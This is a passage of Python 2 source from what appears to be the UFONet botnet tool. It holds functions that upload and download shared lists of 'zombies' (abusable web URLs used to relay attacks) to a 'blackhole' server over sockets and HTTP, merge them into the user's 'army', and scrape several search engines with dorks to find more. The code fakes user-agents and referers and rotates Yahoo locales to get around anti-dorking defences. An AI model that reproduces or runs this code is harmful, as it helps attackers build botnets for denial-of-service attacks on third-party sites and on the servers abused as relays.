 1509. print "\n[AI] Checking integrity of your list of [Zombies] -> [OK!]\n" # only upload valid zombies
 1510. print '='*35
 1511. zombies = self.extract_zombies()
 1512. if not zombies:
 1513. return
 1514. test = self.testing(zombies)
 1515. zombies_community = []
 1516. zombies_added = 0
 1517. f = open('abductions.txt')
 1518. abductions = f.readlines()
 1519. abductions = [abduction.strip() for abduction in abductions]
 1520. f.close()
 1521. fz = open(self.zombies_file)
 1522. zombies = fz.readlines()
 1523. zombies = [zombie.strip() for zombie in zombies]
 1524. fz.close()
 1525. for zombie in zombies:
 1526. if zombie not in abductions:
 1527. zombies_community.append(zombie)
 1528. zombies_added = zombies_added + 1
 1529. else:
 1530. pass
 1531. print("[Info] [AI] New [Zombies] found: " + str(zombies_added))
 1532. aliens = self.extract_aliens()
 1533. if not aliens:
 1534. return
 1535. aliens_community = []
 1536. aliens_added = 0
 1537. f = open('troops.txt')
 1538. troops = f.readlines()
 1539. troops = [troop.strip() for troop in troops]
 1540. f.close()
 1541. fz = open(self.aliens_file)
 1542. aliens = fz.readlines()
 1543. aliens = [alien.strip() for alien in aliens]
 1544. fz.close()
 1545. for alien in aliens:
 1546. if alien not in troops:
 1547. aliens_community.append(alien)
 1548. aliens_added = aliens_added + 1
 1549. else:
 1550. pass
 1551. print("[Info] [AI] New [Aliens] found : " + str(aliens_added))
 1552. droids = self.extract_droids()
 1553. if not droids:
 1554. return
 1555. droids_community = []
 1556. droids_added = 0
 1557. f = open('robots.txt')
 1558. robots = f.readlines()
 1559. robots = [robot.strip() for robot in robots]
 1560. f.close()
 1561. fz = open(self.droids_file)
 1562. droids = fz.readlines()
 1563. droids = [droid.strip() for droid in droids]
 1564. fz.close()
 1565. for droid in droids:
 1566. if droid not in robots:
 1567. droids_community.append(droid)
 1568. droids_added = droids_added + 1
 1569. else:
 1570. pass
 1571. print("[Info] [AI] New [Droids] found : " + str(droids_added))
 1572. ucavs = self.extract_ucavs()
 1573. if not ucavs:
 1574. return
 1575. ucavs_community = []
 1576. ucavs_added = 0
 1577. f = open('drones.txt')
 1578. drones = f.readlines()
 1579. drones = [drone.strip() for drone in drones]
 1580. f.close()
 1581. fz = open(self.ucavs_file)
 1582. ucavs = fz.readlines()
 1583. ucavs = [ucav.strip() for ucav in ucavs]
 1584. fz.close()
 1585. for ucav in ucavs:
 1586. if ucav not in drones:
 1587. ucavs_community.append(ucav)
 1588. ucavs_added = ucavs_added + 1
 1589. else:
 1590. pass
 1591. print("[Info] [AI] New [UCAVs] found : " + str(ucavs_added))
 1592. rpcs = self.extract_rpcs()
 1593. if not ucavs:
 1594. return
 1595. rpcs_community = []
 1596. rpcs_added = 0
 1597. f = open('reflectors.txt')
 1598. reflectors = f.readlines()
 1599. reflectors = [reflector.strip() for reflector in reflectors]
 1600. f.close()
 1601. fz = open(self.rpcs_file)
 1602. rpcs = fz.readlines()
 1603. rpcs = [rpc.strip() for rpc in rpcs]
 1604. fz.close()
 1605. for rpc in rpcs:
 1606. if rpc not in reflectors:
 1607. rpcs_community.append(rpc)
 1608. rpcs_added = rpcs_added + 1
 1609. else:
 1610. pass
 1611. print("[Info] [AI] New [X-RPCs] found : " + str(rpcs_added))
 1612. print '-'*12 + '\n'
 1613. if zombies_added == 0 and aliens_added == 0 and droids_added == 0 and ucavs_added == 0 and rpcs_added == 0: # not any zombie
 1614. os.remove('abductions.txt') # remove abductions file
 1615. os.remove('troops.txt') # remove troops file
 1616. os.remove('robots.txt') # remove robots file
 1617. os.remove('drones.txt') # remove ucavs file
 1618. os.remove('rpcs.txt') # remove rpcs file
 1619. print("[Info] [AI] Try to search for new [Zombies]. These are already in this [Blackhole] -> [Exiting!]\n")
 1620. return
 1621. else:
 1622. fc = gzip.open('community_zombies.txt.gz', 'wb')
 1623. for zombie in zombies_community:
 1624. fc.write(zombie.strip()+"\n")
 1625. fc.close()
 1626. os.remove('abductions.txt') # remove abductions file
 1627. fc = gzip.open('community_aliens.txt.gz', 'wb')
 1628. for alien in aliens_community:
 1629. fc.write(alien.strip()+"\n")
 1630. fc.close()
 1631. os.remove('troops.txt') # remove troops file
 1632. fc = gzip.open('community_droids.txt.gz', 'wb')
 1633. for droid in droids_community:
 1634. fc.write(droid.strip()+"\n")
 1635. fc.close()
 1636. os.remove('robots.txt') # remove robots file
 1637. fc = gzip.open('community_ucavs.txt.gz', 'wb')
 1638. for ucav in ucavs_community:
 1639. fc.write(ucav.strip()+"\n")
 1640. fc.close()
 1641. os.remove('drones.txt') # remove drones file
 1642. fc = gzip.open('community_rpcs.txt.gz', 'wb')
 1643. for rpc in rpcs_community:
 1644. fc.write(rpc.strip()+"\n")
 1645. fc.close()
 1646. os.remove('reflectors.txt') # remove reflectors file
 1647. print("[Info] [AI] Starting to upload new [Zombies]...\n")
 1648. try: # open a socket and send data to the blackhole reciever port
 1649. host = self.blackhole
 1650. cport = 9991
 1651. mport = 9990
 1652. try:
 1653. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data
 1654. cs.connect((host, cport))
 1655. cs.send("SEND " + 'community_zombies.txt.gz')
 1656. cs.close()
 1657. f = open('community_zombies.txt.gz', "rb")
 1658. data = f.read()
 1659. f.close()
 1660. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1661. ms.connect((host, mport))
 1662. ms.send(data)
 1663. ms.close()
 1664. os.remove('community_zombies.txt.gz') # remove local zombies .gz file after transfer
 1665. time.sleep(1)
 1666. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1667. cs.connect((host, cport))
 1668. cs.send("SEND " + 'community_aliens.txt.gz')
 1669. cs.close()
 1670. f = open('community_aliens.txt.gz', "rb")
 1671. data = f.read()
 1672. f.close()
 1673. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1674. ms.connect((host, mport))
 1675. ms.send(data)
 1676. ms.close()
 1677. os.remove('community_aliens.txt.gz') # remove local aliens .gz file after transfer
 1678. time.sleep(1)
 1679. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1680. cs.connect((host, cport))
 1681. cs.send("SEND " + 'community_robots.txt.gz')
 1682. cs.close()
 1683. f = open('community_droids.txt.gz', "rb")
 1684. data = f.read()
 1685. f.close()
 1686. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1687. ms.connect((host, mport))
 1688. ms.send(data)
 1689. ms.close()
 1690. os.remove('community_droids.txt.gz') # remove local droids .gz file after transfer
 1691. time.sleep(1)
 1692. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1693. cs.connect((host, cport))
 1694. cs.send("SEND " + 'community_ucavs.txt.gz')
 1695. cs.close()
 1696. f = open('community_ucavs.txt.gz', "rb")
 1697. data = f.read()
 1698. f.close()
 1699. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1700. ms.connect((host, mport))
 1701. ms.send(data)
 1702. ms.close()
 1703. os.remove('community_ucavs.txt.gz') # remove local ucavs .gz file after transfer
 1704. time.sleep(1)
 1705. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
 1706. cs.connect((host, cport))
 1707. cs.send("SEND " + 'community_rpcs.txt.gz')
 1708. cs.close()
 1709. f = open('community_rpcs.txt.gz', "rb")
 1710. data = f.read()
 1711. f.close()
 1712. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1713. ms.connect((host, mport))
 1714. ms.send(data)
 1715. ms.close()
 1716. os.remove('community_rpcs.txt.gz') # remove local rpcs .gz file after transfer
 1717. time.sleep(2) # sleep a bit more
 1718. print '-'*12 + '\n'
 1719. print("[Info] [AI] Transfer -> [DONE!]\n")
 1720. except Exception, e:
 1721. print str(e) + "\n"
 1722. except:
 1723. print '-'*12 + '\n'
 1724. print("[Error] [AI] Connecting sockets to [Blackhole] -> [Aborting!]\n")
 1725. return
 1726. except:
 1727. print '-'*12 + '\n'
 1728. print("[Error] [AI] Unable to upload list of [Zombies] to this [Blackhole] -> [Exiting!]\n")
 1729. return
 1730. def update_gui_data(self):
 1731. # download all GUI stream data
 1732. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 1733. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1734. if self.options.proxy: # set proxy
 1735. self.proxy_transport(self.options.proxy)
 1736. if self.options.timeout: # set timeout
 1737. try:
 1738. timeout = int(self.options.timeout)
 1739. except:
 1740. timeout = 1
 1741. else:
 1742. timeout = 1
 1743. if timeout < 1:
 1744. timeout = 1
 1745. if self.options.forcessl:
 1746. news = urllib2.Request('https://'+self.blackhole+'/ufonet/news.txt', None, headers)
 1747. news_reply = urllib2.urlopen(news, context=self.ctx, timeout=timeout).read()
 1748. missions = urllib2.Request('https://'+self.blackhole+'/ufonet/missions.txt', None, headers)
 1749. missions_reply = urllib2.urlopen(missions, context=self.ctx, timeout=timeout).read()
 1750. board = urllib2.Request('https://'+self.blackhole+'/ufonet/board.txt', None, headers)
 1751. board_reply = urllib2.urlopen(board, context=self.ctx, timeout=timeout).read()
 1752. grid = urllib2.Request('https://'+self.blackhole+'/ufonet/grid.txt', None, headers)
 1753. grid_reply = urllib2.urlopen(grid, context=self.ctx, timeout=timeout).read()
 1754. wargames = urllib2.Request('https://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
 1755. wargames_reply = urllib2.urlopen(wargames, context=self.ctx, timeout=timeout).read()
 1756. else:
 1757. news = urllib2.Request('http://'+self.blackhole+'/ufonet/news.txt', None, headers)
 1758. news_reply = urllib2.urlopen(news, context=self.ctx).read()
 1759. missions = urllib2.Request('http://'+self.blackhole+'/ufonet/missions.txt', None, headers)
 1760. missions_reply = urllib2.urlopen(missions, context=self.ctx).read()
 1761. board = urllib2.Request('http://'+self.blackhole+'/ufonet/board.txt', None, headers)
 1762. board_reply = urllib2.urlopen(board, context=self.ctx).read()
 1763. grid = urllib2.Request('http://'+self.blackhole+'/ufonet/grid.txt', None, headers)
 1764. grid_reply = urllib2.urlopen(grid, context=self.ctx).read()
 1765. wargames = urllib2.Request('http://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
 1766. wargames_reply = urllib2.urlopen(wargames, context=self.ctx).read()
 1767. f = open(self.news_file, 'w')
 1768. f.write(news_reply)
 1769. f.close()
 1770. f = open(self.missions_file, 'w')
 1771. f.write(missions_reply)
 1772. f.close()
 1773. f = open(self.board_file, 'w')
 1774. f.write(board_reply)
 1775. f.close()
 1776. f = open(self.grid_file, 'w')
 1777. f.write(grid_reply)
 1778. f.close()
 1779. f = open(self.wargames_file, 'w')
 1780. f.write(wargames_reply)
 1781. f.close()
 1782. print '-'*25 + "\n"
 1783. print "[Info] [AI] GUI data correctly updated:\n"
 1784. if news_reply:
 1785. print "[Info] [AI] [News] : OK!"
 1786. if missions_reply:
 1787. print "[Info] [AI] [Missions]: OK!"
 1788. if board_reply:
 1789. print "[Info] [AI] [Board] : OK!"
 1790. if grid_reply:
 1791. print "[Info] [AI] [Grid] : OK!"
 1792. if wargames_reply:
 1793. print "[Info] [AI] [Wargames]: OK!"
 1794. print '-'*25
 1795. print "\n[AI] "+self.exit_msg+"\n"
 1796. def downloading_list(self):
 1797. # add your mirror to protect/share/distribute zombies
 1798. try:
 1799. print("[AI] Trying [Blackhole]: "+self.blackhole+"\n")
 1800. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 1801. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1802. if self.options.timeout: # set timeout
 1803. try:
 1804. timeout = int(self.options.timeout)
 1805. except:
 1806. timeout = 1
 1807. else:
 1808. timeout = 1
 1809. if timeout < 1:
 1810. timeout = 1
 1811. if self.options.forcessl:
 1812. if self.options.proxy: # set proxy
 1813. self.proxy_transport(options.proxy)
 1814. req = urllib2.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
 1815. abductions_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1816. req = urllib2.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
 1817. troops_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1818. req = urllib2.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
 1819. robots_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1820. req = urllib2.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
 1821. drones_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1822. req = urllib2.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
 1823. reflectors_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1824. else:
 1825. if self.options.proxy: # set proxy
 1826. self.proxy_transport(options.proxy)
 1827. req = urllib2.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
 1828. abductions_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1829. req = urllib2.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
 1830. troops_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1831. req = urllib2.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
 1832. robots_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1833. req = urllib2.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
 1834. drones_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1835. req = urllib2.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
 1836. reflectors_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 1837. f = open('abductions.txt.gz', 'w')
 1838. f.write(abductions_reply)
 1839. f.close()
 1840. f = open('troops.txt.gz', 'w')
 1841. f.write(troops_reply)
 1842. f.close()
 1843. f = open('robots.txt.gz', 'w')
 1844. f.write(robots_reply)
 1845. f.close()
 1846. f = open('drones.txt.gz', 'w')
 1847. f.write(drones_reply)
 1848. f.close()
 1849. f = open('reflectors.txt.gz', 'w')
 1850. f.write(reflectors_reply)
 1851. f.close()
 1852. print("[AI] [Control] [Blackhole] Reply: [VORTEX READY!] ;-)")
 1853. except:
 1854. print("[AI] [Control] [Blackhole] Reply: [VORTEX FAILED!]")
 1855. print '-'*12 + '\n'
 1856. print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] -> [Exiting!]\n")
 1857. return
 1858. print '-'*12 + '\n'
 1859. f_in_abductions = gzip.open('abductions.txt.gz', 'rb')
 1860. f_out_abductions = open('abductions.txt', 'wb')
 1861. f_out_abductions.write(f_in_abductions.read())
 1862. f_in_abductions.close()
 1863. f_out_abductions.close()
 1864. os.remove('abductions.txt.gz') # remove abductions .gz file
 1865. f_in_troops = gzip.open('troops.txt.gz', 'rb')
 1866. f_out_troops = open('troops.txt', 'wb')
 1867. f_out_troops.write(f_in_troops.read())
 1868. f_in_troops.close()
 1869. f_out_troops.close()
 1870. os.remove('troops.txt.gz') # remove troops .gz file
 1871. f_in_robots = gzip.open('robots.txt.gz', 'rb')
 1872. f_out_robots = open('robots.txt', 'wb')
 1873. f_out_robots.write(f_in_robots.read())
 1874. f_in_robots.close()
 1875. f_out_robots.close()
 1876. os.remove('robots.txt.gz') # remove robots .gz file
 1877. f_in_drones = gzip.open('drones.txt.gz', 'rb')
 1878. f_out_drones = open('drones.txt', 'wb')
 1879. f_out_drones.write(f_in_drones.read())
 1880. f_in_drones.close()
 1881. f_out_drones.close()
 1882. os.remove('drones.txt.gz') # remove drones .gz file
 1883. f_in_reflectors = gzip.open('reflectors.txt.gz', 'rb')
 1884. f_out_reflectors = open('reflectors.txt', 'wb')
 1885. f_out_reflectors.write(f_in_reflectors.read())
 1886. f_in_reflectors.close()
 1887. f_out_reflectors.close()
 1888. os.remove('reflectors.txt.gz') # remove reflectors .gz file
 1889. num_abductions = 0
 1890. with open('abductions.txt') as f:
 1891. for _ in f:
 1892. num_abductions = num_abductions + 1
 1893. print("[Info] Zombies: " + str(num_abductions))
 1894. num_robots = 0
 1895. with open('robots.txt') as f:
 1896. for _ in f:
 1897. num_robots = num_robots + 1
 1898. print("[Info] Droids : " + str(num_robots))
 1899. num_troops = 0
 1900. with open('troops.txt') as f:
 1901. for _ in f:
 1902. num_troops = num_troops + 1
 1903. print("[Info] Aliens : " + str(num_troops))
 1904. num_drones = 0
 1905. with open('drones.txt') as f:
 1906. for _ in f:
 1907. num_drones = num_drones + 1
 1908. print("[Info] UCAVs : " + str(num_drones))
 1909. num_reflectors = 0
 1910. with open('reflectors.txt') as f:
 1911. for _ in f:
 1912. num_reflectors = num_reflectors + 1
 1913. print("[Info] X-RPCs : " + str(num_reflectors))
 1914. total_zombies = num_abductions + num_troops + num_robots + num_drones + num_reflectors
 1915. print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
 1916. print '-'*12
 1917. if not self.options.forceyes:
 1918. update_reply = raw_input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
 1919. print '-'*25
 1920. else:
 1921. update_reply = "Y"
 1922. if update_reply == "n" or update_reply == "N":
 1923. os.remove('abductions.txt') # remove abductions file
 1924. os.remove('troops.txt') # remove troops file
 1925. os.remove('robots.txt') # remove robots file
 1926. os.remove('drones.txt') # remove drones file
 1927. os.remove('reflectors.txt') # remove reflectors file
 1928. print "\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]"
 1929. print '-'*25
 1930. print "\n[AI] "+self.exit_msg+"\n"
 1931. else:
 1932. zombies_ready = []
 1933. f = open('abductions.txt')
 1934. abductions = f.readlines()
 1935. f.close()
 1936. fz = open(self.zombies_file)
 1937. zombies = fz.readlines()
 1938. fz.close()
 1939. for abduction in abductions:
 1940. abduction = abduction.replace('\n','')
 1941. if abduction not in zombies:
 1942. zombies_ready.append(abduction)
 1943. else:
 1944. pass
 1945. self.update_zombies(zombies_ready)
 1946. os.remove('abductions.txt') # remove abductions .txt file
 1947. aliens_ready = []
 1948. f = open('troops.txt')
 1949. troops = f.readlines()
 1950. f.close()
 1951. fz = open(self.aliens_file)
 1952. aliens = fz.readlines()
 1953. fz.close()
 1954. for alien in troops:
 1955. alien = alien.replace('\n','')
 1956. if alien not in aliens:
 1957. aliens_ready.append(alien)
 1958. else:
 1959. pass
 1960. self.update_aliens(aliens_ready)
 1961. os.remove('troops.txt') # remove troops .txt file
 1962. droids_ready = []
 1963. f = open('robots.txt')
 1964. robots = f.readlines()
 1965. f.close()
 1966. fz = open(self.droids_file)
 1967. droids = fz.readlines()
 1968. fz.close()
 1969. for droid in robots:
 1970. droid = droid.replace('\n','')
 1971. if droid not in droids:
 1972. droids_ready.append(droid)
 1973. else:
 1974. pass
 1975. self.update_droids(droids_ready)
 1976. os.remove('robots.txt') # remove robots .txt file
 1977. ucavs_ready = []
 1978. f = open('drones.txt')
 1979. drones = f.readlines()
 1980. f.close()
 1981. fz = open(self.ucavs_file)
 1982. ucavs = fz.readlines()
 1983. fz.close()
 1984. for drone in drones:
 1985. drone = drone.replace('\n','')
 1986. if drone not in ucavs:
 1987. ucavs_ready.append(drone)
 1988. else:
 1989. pass
 1990. self.update_ucavs(ucavs_ready)
 1991. os.remove('drones.txt') # remove drones .txt file
 1992. rpcs_ready = []
 1993. f = open('reflectors.txt')
 1994. reflectors = f.readlines()
 1995. f.close()
 1996. fz = open(self.rpcs_file)
 1997. rpcs = fz.readlines()
 1998. fz.close()
 1999. for reflector in reflectors:
 2000. reflector = reflector.replace('\n','')
 2001. if reflector not in rpcs:
 2002. rpcs_ready.append(reflector)
 2003. else:
 2004. pass
 2005. self.update_rpcs(rpcs_ready)
 2006. os.remove('reflectors.txt') # remove reflectors .txt file
 2007. print "\n[Info] [AI] Botnet updated! -> ;-)"
 2008. self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
 2009. if not self.options.forceyes: # ask for update everything
 2010. print '-'*25 + "\n"
 2011. update_reply = raw_input("[AI] You would also like to update other content: [News] [Grid] [Board]... (Y/n)")
 2012. else:
 2013. update_reply = "Y"
 2014. if update_reply == "n" or update_reply == "N":
 2015. print "\n[AI] "+self.exit_msg+"\n"
 2016. return
 2017. else:
 2018. try:
 2019. update_gui = self.update_gui_data() # update GUI data
 2020. except:
 2021. print '-'*25 +"\n"
 2022. print "[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]"
 2023. print '-'*25
 2024. print "\n[AI] "+self.exit_msg+"\n"
 2025. return
 2026. def create_web_interface(self):
 2027. # launch webserver+gui
 2028. from webgui import ClientThread
 2029. import webbrowser
 2030. host = '0.0.0.0'
 2031. port = 9999
 2032. try:
 2033. webbrowser.open('http://127.0.0.1:9999', new=1)
 2034. tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 2035. tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 2036. tcpsock.bind((host,port))
 2037. while True:
 2038. tcpsock.listen(4)
 2039. #print "Listening for incoming connections on http://%s:%d" % (host,port)
 2040. (clientsock, (ip, port)) = tcpsock.accept()
 2041. newthread = ClientThread(ip, port, clientsock)
 2042. newthread.start()
 2043. except (KeyboardInterrupt, SystemExit):
 2044. sys.exit()
 2045. def extract_dorks(self):
 2046. # extract dorks from file (ex: 'dorks.txt')
 2047. try:
 2048. f = open(self.dorks_file)
 2049. dorks = f.readlines()
 2050. dorks = [ dork.replace('\n','') for dork in dorks ]
 2051. f.close()
 2052. if not dorks:
 2053. if not options.autosearch:
 2054. print "[Error] [AI] [Control] Cannot retrieve [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n"
 2055. return
 2056. else:
 2057. return dorks
 2058. except:
 2059. if not options.autosearch:
 2060. if os.path.exists(self.dorks_file) == True:
 2061. print "[Error] [AI] [Control] Cannot open [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n"
 2062. return #sys.exit(2)
 2063. else:
 2064. print "[Error] [AI] [Control] Cannot found [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n"
 2065. return #sys.exit(2)
 2066. else:
 2067. return
 2068. def search_zombies(self, dork, zombies_found):
 2069. # crawlering on search engine results to extract zombies
 2070. options = self.options
 2071. zombies = []
 2072. if not options.engine: # default search engine
 2073. options.engine = 'startpage'
 2074. if options.engine == 'bing': # using bing [28/02/2019: OK!]
 2075. url = 'https://www.bing.com/search?'
 2076. if options.search: # search from query
 2077. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
 2078. if options.dorks or options.autosearch: # search from a dork
 2079. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
 2080. start = 0 # set index number of first entry
 2081. query_string = { 'q':q, 'first':start }
 2082. data = urllib.urlencode(query_string)
 2083. url = url + data
 2084. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2085. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2086. if options.verbose:
 2087. print("Query used: " + url + "\n")
 2088. try:
 2089. if options.proxy: # set proxy
 2090. self.proxy_transport(options.proxy)
 2091. req = urllib2.Request(url, None, headers)
 2092. req_reply = urllib2.urlopen(req, context=self.ctx).read()
 2093. except:
 2094. print('[Error] [AI] Unable to connect to: bing\n')
 2095. if options.allengines or options.autosearch:
 2096. return
 2097. if not options.dorks or not options.autosearch:
 2098. if not self.options.forceyes:
 2099. update_reply = raw_input("[AI] Do you want to try a different search engine? (Y/n)")
 2100. else:
 2101. update_reply = "Y"
 2102. if update_reply == "n" or update_reply == "N":
 2103. return #sys.exit(2)
 2104. print "\nSearch engines available:"
 2105. print '-'*25
 2106. for e in self.search_engines:
 2107. print "+ "+e
 2108. print '-'*25
 2109. print "\nEx: ufonet -s 'proxy.php?url=' --se 'startpage'"
 2110. return #sys.exit(2)
 2111. else:
 2112. req_reply = ''
 2113. regex = '<li class="b_algo"><h2><a href="(.+?)">' # regex magics
 2114. pattern = re.compile(regex)
 2115. url_links = re.findall(pattern, req_reply)
 2116. elif options.engine == 'yahoo': # yahoo [28/02/2019: OK!]
 2117. location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # evading Yahoo anti-dorking [grey magic: 28/02/2019]
 2118. #location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
 2119. location = str(random.choice(location).strip()) # shuffle location
 2120. if location == "jp": # [28/02/2019]
 2121. url = 'https://search.yahoo.co.jp/search?'
 2122. else:
 2123. url = 'https://'+location+'.search.yahoo.com/search?'
 2124. if options.search: # search from query
 2125. if location == "jp":
 2126. q = '"' + str(options.search) + '"' # set query to search literally on results
 2127. else:
 2128. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
 2129. if options.dorks or options.autosearch: # search from a dork
 2130. if location == "jp":
 2131. q = '"' + str(dork) + '"' # set query to search literally on results
 2132. else:
 2133. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
 2134. start = 0 # set index number of first entry
 2135. query_string = { 'p':q, 'b':start }
 2136. data = urllib.urlencode(query_string)
 2137. url = url + data
 2138. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2139. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2140. if options.verbose:
 2141. print("Query used: " + url + "\n")
 2142. try:
 2143. if options.proxy: # set proxy
 2144. self.proxy_transport(options.proxy)
 2145. req = urllib2.Request(url, None, headers)
 2146. req_reply = urllib2.urlopen(req, context=self.ctx).read()
 2147. except:
 2148. print('[Error] [AI] Unable to connect to: yahoo\n')
 2149. if options.allengines or options.autosearch:
 2150. return
 2151. if not options.dorks or not options.autosearch:
 2152. if not self.options.forceyes:
 2153. update_reply = raw_input("[AI] Do you want to try a different search engine? (Y/n)")
 2154. else:
 2155. update_reply = "Y"
 2156. if update_reply == "n" or update_reply == "N":
 2157. return #sys.exit(2)
 2158. print "\nSearch engines available:"
 2159. print '-'*25
 2160. for e in self.search_engines:
 2161. print "+ "+e
 2162. print '-'*25
 2163. print "\nEx: ufonet -s 'proxy.php?url=' --se 'bing'"
 2164. return #sys.exit(2)
 2165. else:
 2166. req_reply = ''
 2167. #regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
 2168. regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
 2169. pattern = re.compile(regex)
 2170. url_links = re.findall(pattern, req_reply)
 2171. elif options.engine == 'startpage': # startpage [28/02/2019: OK!]
 2172. url = 'https://www.startpage.com/do/asearch'
 2173. if options.search: # search from query
 2174. q = 'url:"' + str(options.search) + '"' # set query to search literally on results
 2175. if options.dorks or options.autosearch: # search from a dork
 2176. q = 'url:"' + str(dork) + '"' # set query from a dork to search literally on results
 2177. query_string = { 'cmd':'process_search', 'query':q }
 2178. data = urllib.urlencode(query_string)
 2179. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2180. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2181. if options.verbose:
 2182. print("Query used: " + url + " (POST: "+ data + ")\n")
 2183. try:
 2184. if options.proxy: # set proxy
 2185. self.proxy_transport(options.proxy)
 2186. req = urllib2.Request(url, data, headers) # HTTP POST request
 2187. req_reply = urllib2.urlopen(req, context=self.ctx).read()
 2188. except:
 2189. print('[Error] [AI] Unable to connect to: startpage\n')
 2190. if options.allengines or options.autosearch:
 2191. return
 2192. if not options.dorks or not options.autosearch:
 2193. if not self.options.forceyes:
 2194. update_reply = raw_input("[AI] Do you want to try a different search engine? (Y/n)")
 2195. else:
 2196. update_reply = "Y"
 2197. if update_reply == "n" or update_reply == "N":
 2198. return #sys.exit(2)
 2199. print "\nSearch engines available:"
 2200. print '-'*25
 2201. for e in self.search_engines:
 2202. print "+ "+e
 2203. print '-'*25
 2204. print "\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'"
 2205. return #sys.exit(2)
 2206. else:
 2207. req_reply = ''
 2208. regex = 'href="(.+?)" target="_blank" rel' # regex magics [08/04/2017]
 2209. pattern = re.compile(regex)
 2210. url_links = re.findall(pattern, req_reply)
 2211. elif options.engine == 'duck': # using duckduckgo [28/02/2019: OK!]
 2212. url = 'https://duckduckgo.com/html/'
 2213. if options.search: # search from query
 2214. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
 2215. if options.dorks or options.autosearch: # search from a dork
 2216. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
 2217. query_string = { 'q':q }
 2218. data = urllib.urlencode(query_string)
 2219. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2220. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2221. if options.verbose:
 2222. print("Query used: " + url + " (POST: "+ data + ")\n")
 2223. try:
 2224. if options.proxy: # set proxy
 2225. self.proxy_transport(options.proxy)
 2226. req = urllib2.Request(url, data, headers) # HTTP POST request
 2227. req_reply = urllib2.urlopen(req, context=self.ctx).read()
 2228. except:
 2229. print('[Error] [AI] Unable to connect to: duck\n')
 2230. if options.allengines or options.autosearch:
 2231. return
 2232. if not options.dorks or not options.autosearch:
 2233. if not self.options.forceyes:
 2234. update_reply = raw_input("[AI] Do you want to try a different search engine? (Y/n)")
 2235. else:
 2236. update_reply = "Y"
 2237. if update_reply == "n" or update_reply == "N":
 2238. return #sys.exit(2)
 2239. print "\nSearch engines available:"
 2240. print '-'*25
 2241. for e in self.search_engines:
 2242. print "+ "+e
 2243. print '-'*25
 2244. print "\nEx: ufonet -s 'proxy.php?url=' --se 'startpage'"
 2245. return #sys.exit(2)
 2246. else:
 2247. req_reply = ''
